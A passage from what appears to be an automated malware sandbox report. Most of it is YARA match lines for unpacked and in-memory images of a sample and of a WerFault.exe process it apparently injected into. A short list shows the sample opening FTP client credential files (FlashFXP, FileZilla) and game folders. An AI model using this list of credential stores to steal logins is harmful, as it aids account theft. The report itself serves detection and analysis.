                      Source: Yara matchFile source: 4.0.WerFault.exe.2860000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3540000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.11b0000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.1c30000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.1ef0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.34f0000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3a60000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.1ef0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.1c30000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3f70000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.34f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.1c30000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.13.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3ae0000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.13.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.11b0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.0.WerFault.exe.2860000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.1620000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3330000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.13f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.1620000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.BbbEtaIxAU.exe.3450000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.14b0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.BbbEtaIxAU.exe.3450000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.13f0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.14b0000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.2b20000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3330000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.0.WerFault.exe.2860000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.13f0000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.1ef0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3a60000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3b60000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.2b20000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.1ef0000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3780000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3b60000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.34f0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.11b0000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3490000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3330000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.14.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000017.00000002.567453491.0000000001648000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.574455217.0000000003B08000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000000.396214324.0000000001C30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.343659679.00000000012D8000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000000.380564947.0000000001F18000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.316616817.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000000.384576114.00000000037F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000000.435841188.00000000011D8000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.573127445.0000000002B48000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.304781383.0000000000AE8000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.572338181.0000000003518000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000000.432511210.00000000011B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000000.314654922.0000000003330000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.346386030.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.573110629.0000000003818000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.573558016.0000000003F98000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000000.407634102.00000000014D8000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.340678634.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.574221556.0000000003B88000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.329064108.0000000001538000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.321889200.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000000.332881474.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.569348461.00000000011D8000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.392904452.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000000.411551366.0000000001620000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000000.349814520.0000000003490000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.571024772.0000000001418000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.573251429.0000000003568000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.572526351.0000000003A88000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000000.355904622.0000000003540000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.414915674.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.387584046.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.408213818.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.334422756.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.436527162.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000000.403064355.00000000014B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.305956078.0000000000B98000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000000.343998812.0000000002B20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000000.364565540.0000000003F98000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000000.397968179.0000000001C58000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000000.319722392.0000000003B60000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.365991761.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000000.392323666.0000000003B08000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.312736811.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000000.304158494.0000000002860000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.303714856.0000000003450000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.375167210.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000000.377927046.0000000001EF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.573518624.00000000037A8000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000000.386887819.0000000003818000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000000.413386214.0000000001648000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000000.357740409.0000000003568000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000002.569168238.0000000001C58000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.574122408.00000000034B8000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000000.311100250.0000000003A88000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000000.333990965.0000000003518000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000000.309309441.0000000003A60000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000000.361667048.0000000003F70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000000.303926607.0000000002860000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.357948198.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000000.337658379.0000000003780000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.571461105.0000000003358000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000000.321390577.0000000003B88000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000000.371629767.00000000013F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000002.570822035.00000000014D8000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000000.351556895.00000000034B8000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000000.339819447.00000000037A8000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.352061245.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.573636410.0000000001F18000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.398750308.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000000.390278122.0000000003AE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000000.346029099.0000000002B48000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000000.373766478.0000000001418000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000000.316211995.0000000003358000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.381234590.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: BbbEtaIxAU.exe PID: 6084, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: WerFault.exe PID: 712, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: zkqrKAufFycYKMdseGdhuYpyTVNu.exe PID: 2904, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: zkqrKAufFycYKMdseGdhuYpyTVNu.exe PID: 4588, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: zkqrKAufFycYKMdseGdhuYpyTVNu.exe PID: 2888, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: zkqrKAufFycYKMdseGdhuYpyTVNu.exe PID: 4596, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: zkqrKAufFycYKMdseGdhuYpyTVNu.exe PID: 2892, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: zkqrKAufFycYKMdseGdhuYpyTVNu.exe PID: 4756, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: zkqrKAufFycYKMdseGdhuYpyTVNu.exe PID: 4700, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: zkqrKAufFycYKMdseGdhuYpyTVNu.exe PID: 3208, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: zkqrKAufFycYKMdseGdhuYpyTVNu.exe PID: 3232, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: zkqrKAufFycYKMdseGdhuYpyTVNu.exe PID: 4964, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: zkqrKAufFycYKMdseGdhuYpyTVNu.exe PID: 2964, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: zkqrKAufFycYKMdseGdhuYpyTVNu.exe PID: 4720, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: zkqrKAufFycYKMdseGdhuYpyTVNu.exe PID: 2872, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: zkqrKAufFycYKMdseGdhuYpyTVNu.exe PID: 4728, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: zkqrKAufFycYKMdseGdhuYpyTVNu.exe PID: 2296, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: zkqrKAufFycYKMdseGdhuYpyTVNu.exe PID: 4648, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: zkqrKAufFycYKMdseGdhuYpyTVNu.exe PID: 4636, type: MEMORYSTR
                      Source: C:\Windows\SysWOW64\WerFault.exe, File opened: C:\Users\user\AppData\Roaming\FlashFXP\4\Quick.dat
                      Source: C:\Windows\SysWOW64\WerFault.exe, File opened: C:\Users\user\AppData\Roaming\FlashFXP\3\Quick.dat
                      Source: C:\Windows\SysWOW64\WerFault.exe, File opened: C:\Users\user\Desktop\FileZilla\sitemanager.xml
                      Source: C:\Windows\SysWOW64\WerFault.exe, File opened: C:\Users\user\AppData\Roaming\FlashFXP\4\Sites.dat
                      Source: C:\Windows\SysWOW64\WerFault.exe, File opened: C:\Users\user\AppData\Roaming\FlashFXP\3\Sites.dat
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exe, File opened / queried: C:\Users\user\AppData\Roaming\.minecraft
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exe, File opened / queried: C:\Program Files (x86)\League of Legends
                      Source: C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exe, File opened / queried: C:\Users\user\AppData\Roaming\.minecraft
                      Source: C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exe, File opened / queried: C:\Program Files (x86)\League of Legends
                      Source: C:\Windows\SysWOW64\WerFault.exe, File opened / queried: C:\Users\user\AppData\Roaming\.minecraft
                      Source: C:\Windows\SysWOW64\WerFault.exe, File opened / queried: C:\Program Files (x86)\League of Legends
                      Source: C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exe, File opened / queried: C:\Users\user\AppData\Roaming\.minecraft
                      Source: C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exe, File opened / queried: C:\Program Files (x86)\League of Legends
                      Source: C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exe, File opened / queried: C:\Users\user\AppData\Roaming\.minecraft
                      Source: C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exe, File opened / queried: C:\Program Files (x86)\League of Legends

                      Remote Access Functionality

                      Source: Yara matchFile source: 21.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.1c30000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3f70000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.34f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.1c30000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.13.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3ae0000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.13.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.11b0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.0.WerFault.exe.2860000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.1620000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3330000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.13f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.1620000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.BbbEtaIxAU.exe.3450000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.14b0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.BbbEtaIxAU.exe.3450000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.13f0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.14b0000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.2b20000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3330000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.0.WerFault.exe.2860000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.13f0000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.1ef0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3a60000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3b60000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.2b20000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.1ef0000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3780000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3b60000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.34f0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.11b0000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3490000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3330000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.14.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000017.00000002.567453491.0000000001648000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.574455217.0000000003B08000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000000.396214324.0000000001C30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.343659679.00000000012D8000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000000.380564947.0000000001F18000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.316616817.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000000.384576114.00000000037F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000000.435841188.00000000011D8000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.573127445.0000000002B48000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.304781383.0000000000AE8000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.572338181.0000000003518000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000000.432511210.00000000011B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000000.314654922.0000000003330000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.346386030.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.573110629.0000000003818000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.573558016.0000000003F98000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000000.407634102.00000000014D8000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.340678634.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.574221556.0000000003B88000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.329064108.0000000001538000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.321889200.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000000.332881474.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.569348461.00000000011D8000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
